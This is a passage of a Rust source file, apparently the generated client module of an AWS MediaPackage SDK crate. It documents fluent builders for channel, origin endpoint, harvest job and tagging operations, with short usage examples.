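    ///     // Expose an existing channel as an HLS endpoint restricted to one CIDR block.
    ///     let resp = client
    ///         .create_origin_endpoint()
    ///         .channel_id("my-channel")
    ///         .id("my-endpoint")
    ///         .manifest_name("index")
    ///         .hls_package(HlsPackage::builder().segment_duration_seconds(6).build())
    ///         .whitelist("10.0.0.0/8")
    ///         .send()
    ///         .await?;
    ///     println!("endpoint URL: {:?}", resp.url());
    ///     Ok(())
    /// }
    /// ```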
pub fn create_origin_endpoint(&self) -> fluent_builders::CreateOriginEndpoint {
fluent_builders::CreateOriginEndpoint::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`DeleteChannel`](crate::client::fluent_builders::DeleteChannel) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::DeleteChannel::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::DeleteChannel::set_id): The ID of the Channel to delete.
/// - On success, responds with [`DeleteChannelOutput`](crate::output::DeleteChannelOutput)
/// - On failure, responds with [`SdkError<DeleteChannelError>`](crate::error::DeleteChannelError)
pub fn delete_channel(&self) -> fluent_builders::DeleteChannel {
fluent_builders::DeleteChannel::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`DeleteOriginEndpoint`](crate::client::fluent_builders::DeleteOriginEndpoint) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::DeleteOriginEndpoint::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::DeleteOriginEndpoint::set_id): The ID of the OriginEndpoint to delete.
/// - On success, responds with [`DeleteOriginEndpointOutput`](crate::output::DeleteOriginEndpointOutput)
/// - On failure, responds with [`SdkError<DeleteOriginEndpointError>`](crate::error::DeleteOriginEndpointError)
pub fn delete_origin_endpoint(&self) -> fluent_builders::DeleteOriginEndpoint {
fluent_builders::DeleteOriginEndpoint::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`DescribeChannel`](crate::client::fluent_builders::DescribeChannel) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::DescribeChannel::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::DescribeChannel::set_id): The ID of a Channel.
/// - On success, responds with [`DescribeChannelOutput`](crate::output::DescribeChannelOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::DescribeChannelOutput::arn): The Amazon Resource Name (ARN) assigned to the Channel.
/// - [`description(Option<String>)`](crate::output::DescribeChannelOutput::description): A short text description of the Channel.
/// - [`egress_access_logs(Option<EgressAccessLogs>)`](crate::output::DescribeChannelOutput::egress_access_logs): Configure egress access logging.
/// - [`hls_ingest(Option<HlsIngest>)`](crate::output::DescribeChannelOutput::hls_ingest): An HTTP Live Streaming (HLS) ingest resource configuration.
/// - [`id(Option<String>)`](crate::output::DescribeChannelOutput::id): The ID of the Channel.
/// - [`ingress_access_logs(Option<IngressAccessLogs>)`](crate::output::DescribeChannelOutput::ingress_access_logs): Configure ingress access logging.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::DescribeChannelOutput::tags): A collection of tags associated with a resource
/// - On failure, responds with [`SdkError<DescribeChannelError>`](crate::error::DescribeChannelError)
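    ///
    /// A hand-written usage sketch (the crate name `aws_sdk_mediapackage` and the channel ID are placeholders):
    /// ```no_run
    /// async fn example(client: &aws_sdk_mediapackage::Client) -> Result<(), aws_sdk_mediapackage::Error> {
    ///     let resp = client.describe_channel().id("my-channel").send().await?;
    ///     println!("ARN: {:?}", resp.arn());
    ///     // The HLS ingest configuration carries the channel's ingest endpoints.
    ///     if let Some(ingest) = resp.hls_ingest() {
    ///         println!("ingest: {:?}", ingest);
    ///     }
    ///     Ok(())
    /// }
    /// ```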
pub fn describe_channel(&self) -> fluent_builders::DescribeChannel {
fluent_builders::DescribeChannel::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`DescribeHarvestJob`](crate::client::fluent_builders::DescribeHarvestJob) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::DescribeHarvestJob::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::DescribeHarvestJob::set_id): The ID of the HarvestJob.
/// - On success, responds with [`DescribeHarvestJobOutput`](crate::output::DescribeHarvestJobOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::DescribeHarvestJobOutput::arn): The Amazon Resource Name (ARN) assigned to the HarvestJob.
/// - [`channel_id(Option<String>)`](crate::output::DescribeHarvestJobOutput::channel_id): The ID of the Channel that the HarvestJob will harvest from.
/// - [`created_at(Option<String>)`](crate::output::DescribeHarvestJobOutput::created_at): The time the HarvestJob was submitted
/// - [`end_time(Option<String>)`](crate::output::DescribeHarvestJobOutput::end_time): The end of the time-window which will be harvested.
/// - [`id(Option<String>)`](crate::output::DescribeHarvestJobOutput::id): The ID of the HarvestJob. The ID must be unique within the region and it cannot be changed after the HarvestJob is submitted.
/// - [`origin_endpoint_id(Option<String>)`](crate::output::DescribeHarvestJobOutput::origin_endpoint_id): The ID of the OriginEndpoint that the HarvestJob will harvest from. This cannot be changed after the HarvestJob is submitted.
/// - [`s3_destination(Option<S3Destination>)`](crate::output::DescribeHarvestJobOutput::s3_destination): Configuration parameters for where in an S3 bucket to place the harvested content
/// - [`start_time(Option<String>)`](crate::output::DescribeHarvestJobOutput::start_time): The start of the time-window which will be harvested.
/// - [`status(Option<Status>)`](crate::output::DescribeHarvestJobOutput::status): The current status of the HarvestJob. Consider setting up a CloudWatch Event to listen for HarvestJobs as they succeed or fail. In the event of failure, the CloudWatch Event will include an explanation of why the HarvestJob failed.
/// - On failure, responds with [`SdkError<DescribeHarvestJobError>`](crate::error::DescribeHarvestJobError)
pub fn describe_harvest_job(&self) -> fluent_builders::DescribeHarvestJob {
fluent_builders::DescribeHarvestJob::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`DescribeOriginEndpoint`](crate::client::fluent_builders::DescribeOriginEndpoint) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::DescribeOriginEndpoint::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::DescribeOriginEndpoint::set_id): The ID of the OriginEndpoint.
/// - On success, responds with [`DescribeOriginEndpointOutput`](crate::output::DescribeOriginEndpointOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::DescribeOriginEndpointOutput::arn): The Amazon Resource Name (ARN) assigned to the OriginEndpoint.
/// - [`authorization(Option<Authorization>)`](crate::output::DescribeOriginEndpointOutput::authorization): CDN Authorization credentials
/// - [`channel_id(Option<String>)`](crate::output::DescribeOriginEndpointOutput::channel_id): The ID of the Channel the OriginEndpoint is associated with.
/// - [`cmaf_package(Option<CmafPackage>)`](crate::output::DescribeOriginEndpointOutput::cmaf_package): A Common Media Application Format (CMAF) packaging configuration.
/// - [`dash_package(Option<DashPackage>)`](crate::output::DescribeOriginEndpointOutput::dash_package): A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
/// - [`description(Option<String>)`](crate::output::DescribeOriginEndpointOutput::description): A short text description of the OriginEndpoint.
/// - [`hls_package(Option<HlsPackage>)`](crate::output::DescribeOriginEndpointOutput::hls_package): An HTTP Live Streaming (HLS) packaging configuration.
/// - [`id(Option<String>)`](crate::output::DescribeOriginEndpointOutput::id): The ID of the OriginEndpoint.
/// - [`manifest_name(Option<String>)`](crate::output::DescribeOriginEndpointOutput::manifest_name): A short string appended to the end of the OriginEndpoint URL.
/// - [`mss_package(Option<MssPackage>)`](crate::output::DescribeOriginEndpointOutput::mss_package): A Microsoft Smooth Streaming (MSS) packaging configuration.
    /// - [`origination(Option<Origination>)`](crate::output::DescribeOriginEndpointOutput::origination): Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may be requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination.
/// - [`startover_window_seconds(i32)`](crate::output::DescribeOriginEndpointOutput::startover_window_seconds): Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::DescribeOriginEndpointOutput::tags): A collection of tags associated with a resource
/// - [`time_delay_seconds(i32)`](crate::output::DescribeOriginEndpointOutput::time_delay_seconds): Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
/// - [`url(Option<String>)`](crate::output::DescribeOriginEndpointOutput::url): The URL of the packaged OriginEndpoint for consumption.
/// - [`whitelist(Option<Vec<String>>)`](crate::output::DescribeOriginEndpointOutput::whitelist): A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
/// - On failure, responds with [`SdkError<DescribeOriginEndpointError>`](crate::error::DescribeOriginEndpointError)
pub fn describe_origin_endpoint(&self) -> fluent_builders::DescribeOriginEndpoint {
fluent_builders::DescribeOriginEndpoint::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`ListChannels`](crate::client::fluent_builders::ListChannels) operation.
    /// This operation supports pagination; see [`into_paginator()`](crate::client::fluent_builders::ListChannels::into_paginator).
///
/// - The fluent builder is configurable:
/// - [`max_results(i32)`](crate::client::fluent_builders::ListChannels::max_results) / [`set_max_results(i32)`](crate::client::fluent_builders::ListChannels::set_max_results): Upper bound on number of records to return.
/// - [`next_token(impl Into<String>)`](crate::client::fluent_builders::ListChannels::next_token) / [`set_next_token(Option<String>)`](crate::client::fluent_builders::ListChannels::set_next_token): A token used to resume pagination from the end of a previous request.
/// - On success, responds with [`ListChannelsOutput`](crate::output::ListChannelsOutput) with field(s):
/// - [`channels(Option<Vec<Channel>>)`](crate::output::ListChannelsOutput::channels): A list of Channel records.
/// - [`next_token(Option<String>)`](crate::output::ListChannelsOutput::next_token): A token that can be used to resume pagination from the end of the collection.
/// - On failure, responds with [`SdkError<ListChannelsError>`](crate::error::ListChannelsError)
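    ///
    /// A hand-written sketch of manual pagination with `next_token` (the crate name `aws_sdk_mediapackage` is assumed; `into_paginator()` is the more convenient alternative mentioned above):
    /// ```no_run
    /// async fn example(client: &aws_sdk_mediapackage::Client) -> Result<(), aws_sdk_mediapackage::Error> {
    ///     let mut next_token: Option<String> = None;
    ///     loop {
    ///         // Request one page at a time, resuming from the previous page's token.
    ///         let mut req = client.list_channels().max_results(10);
    ///         if let Some(token) = next_token.take() {
    ///             req = req.next_token(token);
    ///         }
    ///         let page = req.send().await?;
    ///         for channel in page.channels().unwrap_or_default() {
    ///             println!("channel: {:?}", channel.id());
    ///         }
    ///         next_token = page.next_token().map(|t| t.to_string());
    ///         if next_token.is_none() {
    ///             break;
    ///         }
    ///     }
    ///     Ok(())
    /// }
    /// ```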
pub fn list_channels(&self) -> fluent_builders::ListChannels {
fluent_builders::ListChannels::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`ListHarvestJobs`](crate::client::fluent_builders::ListHarvestJobs) operation.
    /// This operation supports pagination; see [`into_paginator()`](crate::client::fluent_builders::ListHarvestJobs::into_paginator).
///
/// - The fluent builder is configurable:
/// - [`include_channel_id(impl Into<String>)`](crate::client::fluent_builders::ListHarvestJobs::include_channel_id) / [`set_include_channel_id(Option<String>)`](crate::client::fluent_builders::ListHarvestJobs::set_include_channel_id): When specified, the request will return only HarvestJobs associated with the given Channel ID.
/// - [`include_status(impl Into<String>)`](crate::client::fluent_builders::ListHarvestJobs::include_status) / [`set_include_status(Option<String>)`](crate::client::fluent_builders::ListHarvestJobs::set_include_status): When specified, the request will return only HarvestJobs in the given status.
/// - [`max_results(i32)`](crate::client::fluent_builders::ListHarvestJobs::max_results) / [`set_max_results(i32)`](crate::client::fluent_builders::ListHarvestJobs::set_max_results): The upper bound on the number of records to return.
/// - [`next_token(impl Into<String>)`](crate::client::fluent_builders::ListHarvestJobs::next_token) / [`set_next_token(Option<String>)`](crate::client::fluent_builders::ListHarvestJobs::set_next_token): A token used to resume pagination from the end of a previous request.
/// - On success, responds with [`ListHarvestJobsOutput`](crate::output::ListHarvestJobsOutput) with field(s):
/// - [`harvest_jobs(Option<Vec<HarvestJob>>)`](crate::output::ListHarvestJobsOutput::harvest_jobs): A list of HarvestJob records.
/// - [`next_token(Option<String>)`](crate::output::ListHarvestJobsOutput::next_token): A token that can be used to resume pagination from the end of the collection.
/// - On failure, responds with [`SdkError<ListHarvestJobsError>`](crate::error::ListHarvestJobsError)
pub fn list_harvest_jobs(&self) -> fluent_builders::ListHarvestJobs {
fluent_builders::ListHarvestJobs::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`ListOriginEndpoints`](crate::client::fluent_builders::ListOriginEndpoints) operation.
    /// This operation supports pagination; see [`into_paginator()`](crate::client::fluent_builders::ListOriginEndpoints::into_paginator).
///
/// - The fluent builder is configurable:
/// - [`channel_id(impl Into<String>)`](crate::client::fluent_builders::ListOriginEndpoints::channel_id) / [`set_channel_id(Option<String>)`](crate::client::fluent_builders::ListOriginEndpoints::set_channel_id): When specified, the request will return only OriginEndpoints associated with the given Channel ID.
/// - [`max_results(i32)`](crate::client::fluent_builders::ListOriginEndpoints::max_results) / [`set_max_results(i32)`](crate::client::fluent_builders::ListOriginEndpoints::set_max_results): The upper bound on the number of records to return.
/// - [`next_token(impl Into<String>)`](crate::client::fluent_builders::ListOriginEndpoints::next_token) / [`set_next_token(Option<String>)`](crate::client::fluent_builders::ListOriginEndpoints::set_next_token): A token used to resume pagination from the end of a previous request.
/// - On success, responds with [`ListOriginEndpointsOutput`](crate::output::ListOriginEndpointsOutput) with field(s):
/// - [`next_token(Option<String>)`](crate::output::ListOriginEndpointsOutput::next_token): A token that can be used to resume pagination from the end of the collection.
/// - [`origin_endpoints(Option<Vec<OriginEndpoint>>)`](crate::output::ListOriginEndpointsOutput::origin_endpoints): A list of OriginEndpoint records.
/// - On failure, responds with [`SdkError<ListOriginEndpointsError>`](crate::error::ListOriginEndpointsError)
pub fn list_origin_endpoints(&self) -> fluent_builders::ListOriginEndpoints {
fluent_builders::ListOriginEndpoints::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`ListTagsForResource`](crate::client::fluent_builders::ListTagsForResource) operation.
///
/// - The fluent builder is configurable:
/// - [`resource_arn(impl Into<String>)`](crate::client::fluent_builders::ListTagsForResource::resource_arn) / [`set_resource_arn(Option<String>)`](crate::client::fluent_builders::ListTagsForResource::set_resource_arn): (undocumented)
/// - On success, responds with [`ListTagsForResourceOutput`](crate::output::ListTagsForResourceOutput) with field(s):
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::ListTagsForResourceOutput::tags): (undocumented)
/// - On failure, responds with [`SdkError<ListTagsForResourceError>`](crate::error::ListTagsForResourceError)
pub fn list_tags_for_resource(&self) -> fluent_builders::ListTagsForResource {
fluent_builders::ListTagsForResource::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`RotateChannelCredentials`](crate::client::fluent_builders::RotateChannelCredentials) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::RotateChannelCredentials::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::RotateChannelCredentials::set_id): The ID of the channel to update.
/// - On success, responds with [`RotateChannelCredentialsOutput`](crate::output::RotateChannelCredentialsOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::RotateChannelCredentialsOutput::arn): The Amazon Resource Name (ARN) assigned to the Channel.
/// - [`description(Option<String>)`](crate::output::RotateChannelCredentialsOutput::description): A short text description of the Channel.
    /// - [`egress_access_logs(Option<EgressAccessLogs>)`](crate::output::RotateChannelCredentialsOutput::egress_access_logs): Configure egress access logging.
    /// - [`hls_ingest(Option<HlsIngest>)`](crate::output::RotateChannelCredentialsOutput::hls_ingest): An HTTP Live Streaming (HLS) ingest resource configuration.
    /// - [`id(Option<String>)`](crate::output::RotateChannelCredentialsOutput::id): The ID of the Channel.
    /// - [`ingress_access_logs(Option<IngressAccessLogs>)`](crate::output::RotateChannelCredentialsOutput::ingress_access_logs): Configure ingress access logging.
    /// - [`tags(Option<HashMap<String, String>>)`](crate::output::RotateChannelCredentialsOutput::tags): A collection of tags associated with a resource
/// - On failure, responds with [`SdkError<RotateChannelCredentialsError>`](crate::error::RotateChannelCredentialsError)
pub fn rotate_channel_credentials(&self) -> fluent_builders::RotateChannelCredentials {
fluent_builders::RotateChannelCredentials::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`RotateIngestEndpointCredentials`](crate::client::fluent_builders::RotateIngestEndpointCredentials) operation.
///
/// - The fluent builder is configurable:
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::RotateIngestEndpointCredentials::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::RotateIngestEndpointCredentials::set_id): The ID of the channel the IngestEndpoint is on.
/// - [`ingest_endpoint_id(impl Into<String>)`](crate::client::fluent_builders::RotateIngestEndpointCredentials::ingest_endpoint_id) / [`set_ingest_endpoint_id(Option<String>)`](crate::client::fluent_builders::RotateIngestEndpointCredentials::set_ingest_endpoint_id): The id of the IngestEndpoint whose credentials should be rotated
/// - On success, responds with [`RotateIngestEndpointCredentialsOutput`](crate::output::RotateIngestEndpointCredentialsOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::RotateIngestEndpointCredentialsOutput::arn): The Amazon Resource Name (ARN) assigned to the Channel.
/// - [`description(Option<String>)`](crate::output::RotateIngestEndpointCredentialsOutput::description): A short text description of the Channel.
/// - [`egress_access_logs(Option<EgressAccessLogs>)`](crate::output::RotateIngestEndpointCredentialsOutput::egress_access_logs): Configure egress access logging.
/// - [`hls_ingest(Option<HlsIngest>)`](crate::output::RotateIngestEndpointCredentialsOutput::hls_ingest): An HTTP Live Streaming (HLS) ingest resource configuration.
/// - [`id(Option<String>)`](crate::output::RotateIngestEndpointCredentialsOutput::id): The ID of the Channel.
/// - [`ingress_access_logs(Option<IngressAccessLogs>)`](crate::output::RotateIngestEndpointCredentialsOutput::ingress_access_logs): Configure ingress access logging.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::RotateIngestEndpointCredentialsOutput::tags): A collection of tags associated with a resource
/// - On failure, responds with [`SdkError<RotateIngestEndpointCredentialsError>`](crate::error::RotateIngestEndpointCredentialsError)
pub fn rotate_ingest_endpoint_credentials(
&self,
) -> fluent_builders::RotateIngestEndpointCredentials {
fluent_builders::RotateIngestEndpointCredentials::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`TagResource`](crate::client::fluent_builders::TagResource) operation.
///
/// - The fluent builder is configurable:
/// - [`resource_arn(impl Into<String>)`](crate::client::fluent_builders::TagResource::resource_arn) / [`set_resource_arn(Option<String>)`](crate::client::fluent_builders::TagResource::set_resource_arn): (undocumented)
/// - [`tags(HashMap<String, String>)`](crate::client::fluent_builders::TagResource::tags) / [`set_tags(Option<HashMap<String, String>>)`](crate::client::fluent_builders::TagResource::set_tags): (undocumented)
/// - On success, responds with [`TagResourceOutput`](crate::output::TagResourceOutput)
/// - On failure, responds with [`SdkError<TagResourceError>`](crate::error::TagResourceError)
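    ///
    /// A hand-written usage sketch (the crate name `aws_sdk_mediapackage` and the resource ARN are placeholders):
    /// ```no_run
    /// async fn example(client: &aws_sdk_mediapackage::Client) -> Result<(), aws_sdk_mediapackage::Error> {
    ///     // Attach a tag to an existing MediaPackage resource.
    ///     client
    ///         .tag_resource()
    ///         .resource_arn("arn:aws:mediapackage:us-west-2:123456789012:channels/my-channel")
    ///         .tags("env", "dev")
    ///         .send()
    ///         .await?;
    ///     Ok(())
    /// }
    /// ```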
pub fn tag_resource(&self) -> fluent_builders::TagResource {
fluent_builders::TagResource::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`UntagResource`](crate::client::fluent_builders::UntagResource) operation.
///
/// - The fluent builder is configurable:
/// - [`resource_arn(impl Into<String>)`](crate::client::fluent_builders::UntagResource::resource_arn) / [`set_resource_arn(Option<String>)`](crate::client::fluent_builders::UntagResource::set_resource_arn): (undocumented)
    /// - [`tag_keys(Vec<String>)`](crate::client::fluent_builders::UntagResource::tag_keys) / [`set_tag_keys(Option<Vec<String>>)`](crate::client::fluent_builders::UntagResource::set_tag_keys): The key(s) of the tag(s) to be deleted
/// - On success, responds with [`UntagResourceOutput`](crate::output::UntagResourceOutput)
/// - On failure, responds with [`SdkError<UntagResourceError>`](crate::error::UntagResourceError)
pub fn untag_resource(&self) -> fluent_builders::UntagResource {
fluent_builders::UntagResource::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`UpdateChannel`](crate::client::fluent_builders::UpdateChannel) operation.
///
/// - The fluent builder is configurable:
/// - [`description(impl Into<String>)`](crate::client::fluent_builders::UpdateChannel::description) / [`set_description(Option<String>)`](crate::client::fluent_builders::UpdateChannel::set_description): A short text description of the Channel.
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::UpdateChannel::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::UpdateChannel::set_id): The ID of the Channel to update.
/// - On success, responds with [`UpdateChannelOutput`](crate::output::UpdateChannelOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::UpdateChannelOutput::arn): The Amazon Resource Name (ARN) assigned to the Channel.
/// - [`description(Option<String>)`](crate::output::UpdateChannelOutput::description): A short text description of the Channel.
/// - [`egress_access_logs(Option<EgressAccessLogs>)`](crate::output::UpdateChannelOutput::egress_access_logs): Configure egress access logging.
/// - [`hls_ingest(Option<HlsIngest>)`](crate::output::UpdateChannelOutput::hls_ingest): An HTTP Live Streaming (HLS) ingest resource configuration.
/// - [`id(Option<String>)`](crate::output::UpdateChannelOutput::id): The ID of the Channel.
/// - [`ingress_access_logs(Option<IngressAccessLogs>)`](crate::output::UpdateChannelOutput::ingress_access_logs): Configure ingress access logging.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::UpdateChannelOutput::tags): A collection of tags associated with a resource
/// - On failure, responds with [`SdkError<UpdateChannelError>`](crate::error::UpdateChannelError)
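    ///
    /// A hand-written usage sketch (the crate name `aws_sdk_mediapackage` and the channel ID are placeholders):
    /// ```no_run
    /// async fn example(client: &aws_sdk_mediapackage::Client) -> Result<(), aws_sdk_mediapackage::Error> {
    ///     // Only the description can be changed; the ID selects the channel.
    ///     let resp = client
    ///         .update_channel()
    ///         .id("my-channel")
    ///         .description("Updated description")
    ///         .send()
    ///         .await?;
    ///     println!("description is now: {:?}", resp.description());
    ///     Ok(())
    /// }
    /// ```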
pub fn update_channel(&self) -> fluent_builders::UpdateChannel {
fluent_builders::UpdateChannel::new(self.handle.clone())
}
/// Constructs a fluent builder for the [`UpdateOriginEndpoint`](crate::client::fluent_builders::UpdateOriginEndpoint) operation.
///
/// - The fluent builder is configurable:
/// - [`authorization(Authorization)`](crate::client::fluent_builders::UpdateOriginEndpoint::authorization) / [`set_authorization(Option<Authorization>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_authorization): CDN Authorization credentials
/// - [`cmaf_package(CmafPackageCreateOrUpdateParameters)`](crate::client::fluent_builders::UpdateOriginEndpoint::cmaf_package) / [`set_cmaf_package(Option<CmafPackageCreateOrUpdateParameters>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_cmaf_package): A Common Media Application Format (CMAF) packaging configuration.
/// - [`dash_package(DashPackage)`](crate::client::fluent_builders::UpdateOriginEndpoint::dash_package) / [`set_dash_package(Option<DashPackage>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_dash_package): A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
/// - [`description(impl Into<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::description) / [`set_description(Option<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_description): A short text description of the OriginEndpoint.
/// - [`hls_package(HlsPackage)`](crate::client::fluent_builders::UpdateOriginEndpoint::hls_package) / [`set_hls_package(Option<HlsPackage>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_hls_package): An HTTP Live Streaming (HLS) packaging configuration.
/// - [`id(impl Into<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::id) / [`set_id(Option<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_id): The ID of the OriginEndpoint to update.
/// - [`manifest_name(impl Into<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::manifest_name) / [`set_manifest_name(Option<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_manifest_name): A short string that will be appended to the end of the Endpoint URL.
/// - [`mss_package(MssPackage)`](crate::client::fluent_builders::UpdateOriginEndpoint::mss_package) / [`set_mss_package(Option<MssPackage>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_mss_package): A Microsoft Smooth Streaming (MSS) packaging configuration.
    /// - [`origination(Origination)`](crate::client::fluent_builders::UpdateOriginEndpoint::origination) / [`set_origination(Option<Origination>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_origination): Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may be requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination.
/// - [`startover_window_seconds(i32)`](crate::client::fluent_builders::UpdateOriginEndpoint::startover_window_seconds) / [`set_startover_window_seconds(i32)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_startover_window_seconds): Maximum duration (in seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
/// - [`time_delay_seconds(i32)`](crate::client::fluent_builders::UpdateOriginEndpoint::time_delay_seconds) / [`set_time_delay_seconds(i32)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_time_delay_seconds): Amount of delay (in seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
/// - [`whitelist(Vec<String>)`](crate::client::fluent_builders::UpdateOriginEndpoint::whitelist) / [`set_whitelist(Option<Vec<String>>)`](crate::client::fluent_builders::UpdateOriginEndpoint::set_whitelist): A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
/// - On success, responds with [`UpdateOriginEndpointOutput`](crate::output::UpdateOriginEndpointOutput) with field(s):
/// - [`arn(Option<String>)`](crate::output::UpdateOriginEndpointOutput::arn): The Amazon Resource Name (ARN) assigned to the OriginEndpoint.
/// - [`authorization(Option<Authorization>)`](crate::output::UpdateOriginEndpointOutput::authorization): CDN Authorization credentials
/// - [`channel_id(Option<String>)`](crate::output::UpdateOriginEndpointOutput::channel_id): The ID of the Channel the OriginEndpoint is associated with.
/// - [`cmaf_package(Option<CmafPackage>)`](crate::output::UpdateOriginEndpointOutput::cmaf_package): A Common Media Application Format (CMAF) packaging configuration.
/// - [`dash_package(Option<DashPackage>)`](crate::output::UpdateOriginEndpointOutput::dash_package): A Dynamic Adaptive Streaming over HTTP (DASH) packaging configuration.
/// - [`description(Option<String>)`](crate::output::UpdateOriginEndpointOutput::description): A short text description of the OriginEndpoint.
/// - [`hls_package(Option<HlsPackage>)`](crate::output::UpdateOriginEndpointOutput::hls_package): An HTTP Live Streaming (HLS) packaging configuration.
/// - [`id(Option<String>)`](crate::output::UpdateOriginEndpointOutput::id): The ID of the OriginEndpoint.
/// - [`manifest_name(Option<String>)`](crate::output::UpdateOriginEndpointOutput::manifest_name): A short string appended to the end of the OriginEndpoint URL.
/// - [`mss_package(Option<MssPackage>)`](crate::output::UpdateOriginEndpointOutput::mss_package): A Microsoft Smooth Streaming (MSS) packaging configuration.
    /// - [`origination(Option<Origination>)`](crate::output::UpdateOriginEndpointOutput::origination): Control whether origination of video is allowed for this OriginEndpoint. If set to ALLOW, the OriginEndpoint may be requested, pursuant to any other form of access control. If set to DENY, the OriginEndpoint may not be requested. This can be helpful for Live to VOD harvesting, or for temporarily disabling origination.
/// - [`startover_window_seconds(i32)`](crate::output::UpdateOriginEndpointOutput::startover_window_seconds): Maximum duration (seconds) of content to retain for startover playback. If not specified, startover playback will be disabled for the OriginEndpoint.
/// - [`tags(Option<HashMap<String, String>>)`](crate::output::UpdateOriginEndpointOutput::tags): A collection of tags associated with a resource
/// - [`time_delay_seconds(i32)`](crate::output::UpdateOriginEndpointOutput::time_delay_seconds): Amount of delay (seconds) to enforce on the playback of live content. If not specified, there will be no time delay in effect for the OriginEndpoint.
/// - [`url(Option<String>)`](crate::output::UpdateOriginEndpointOutput::url): The URL of the packaged OriginEndpoint for consumption.
/// - [`whitelist(Option<Vec<String>>)`](crate::output::UpdateOriginEndpointOutput::whitelist): A list of source IP CIDR blocks that will be allowed to access the OriginEndpoint.
/// - On failure, responds with [`SdkError<UpdateOriginEndpointError>`](crate::error::UpdateOriginEndpointError)
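    ///
    /// A hand-written usage sketch; the crate name `aws_sdk_mediapackage` and the endpoint ID are placeholders, and the `Origination::Deny` variant name is assumed from the API's DENY value.
    /// ```no_run
    /// use aws_sdk_mediapackage::model::Origination;
    ///
    /// async fn example(client: &aws_sdk_mediapackage::Client) -> Result<(), aws_sdk_mediapackage::Error> {
    ///     // Temporarily disable origination and add a 30 second playback delay.
    ///     let resp = client
    ///         .update_origin_endpoint()
    ///         .id("my-endpoint")
    ///         .origination(Origination::Deny)
    ///         .time_delay_seconds(30)
    ///         .send()
    ///         .await?;
    ///     println!("origination is now: {:?}", resp.origination());
    ///     Ok(())
    /// }
    /// ```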
pub fn update_origin_endpoint(&self) -> fluent_builders::UpdateOriginEndpoint {
fluent_builders::UpdateOriginEndpoint::new(self.handle.clone())
}
}
pub mod fluent_builders {
//!
//! Utilities to ergonomically construct a request to the service.
//!
//! Fluent builders are created through the [`Client`](crate::client::Client) by calling
    //! one of its operation methods. After parameters are set using the builder methods,
//! the `send` method can be called to initiate the request.
//!
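    //! A hand-written sketch of the general pattern (the crate name `aws_sdk_mediapackage` and the channel ID are placeholders; a `Client` is typically built from configuration loaded with the `aws-config` crate):
    //! ```no_run
    //! async fn example(client: &aws_sdk_mediapackage::Client) -> Result<(), aws_sdk_mediapackage::Error> {
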